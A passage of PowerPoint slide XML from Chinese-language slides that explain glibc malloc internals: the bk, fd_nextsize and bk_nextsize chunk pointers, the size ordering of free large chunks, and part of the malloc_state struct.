          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>bk pointer</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1"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E8AF59CC-C7B3-4ACF-9399-8774E175B39C}"/>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6480000" y="2160000"/>
            <a:ext cx="4010025" cy="3057525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A0ADB66-7BC6-41BD-85A8-D195BB252BF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="3165416"/>
            <a:ext cx="3667760"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bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>中指向上一个（非物理相邻）空闲的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk</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5123470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8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A98720B4-6763-4FDE-8486-84858A318A2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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94875F5E-8D8E-4D80-AFBD-B03CC16722DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="1458203"/>
            <a:ext cx="2497800" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fd_nextsize</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1"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4643660D-2294-4292-939E-93EA61CE20C7}"/>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6480000" y="2160000"/>
            <a:ext cx="4010025" cy="3057525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9F2BB01-EFD7-4981-92A6-E55036B43D6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="3165416"/>
            <a:ext cx="3667760"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large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bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>中指向前一个与当前 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>大小不同的第一个空闲块，不包含 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>bin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的头指针</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="380260113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8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A98720B4-6763-4FDE-8486-84858A318A2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chunk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94875F5E-8D8E-4D80-AFBD-B03CC16722DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="1458203"/>
            <a:ext cx="2577950" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>bk_nextsize</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1"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05389CB7-7F5D-4268-82B5-733CE28BA5EE}"/>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6480000" y="2160000"/>
            <a:ext cx="4010025" cy="3057525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DFBCE28-02B8-43DA-8E12-13C87AA28DEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="3165416"/>
            <a:ext cx="3667760"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large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bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>中指向后一个与当前 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>大小不同的第一个空闲块，不包含 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>bin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的头指针</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1BD9B44-6D6C-43A6-B8EA-53A46EBC9478}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="589280" y="6170686"/>
            <a:ext cx="11460480" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>一般空闲的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>large chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的遍历顺序中，按照由大到小的顺序排列。这样做可以避免在寻找合适 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>挨个遍历</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg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18390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3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1C3A78D-0F5D-4103-9FE5-455AD0BD5122}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588072" y="1202327"/>
            <a:ext cx="11015856" cy="5447645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="267F99"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malloc_state</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* Serialize access.  */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>libc_lock_define</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* Flags (formerly in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>max_fast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).  */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>flags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Fastbins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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mfastbinptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fastbinsY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[ NFASTBINS ];</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* Base of the topmost chunk -- not otherwise kept in a bin */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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mchunkptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>top</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/* The remainder from the most recent split of a small request */</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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mchunkptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
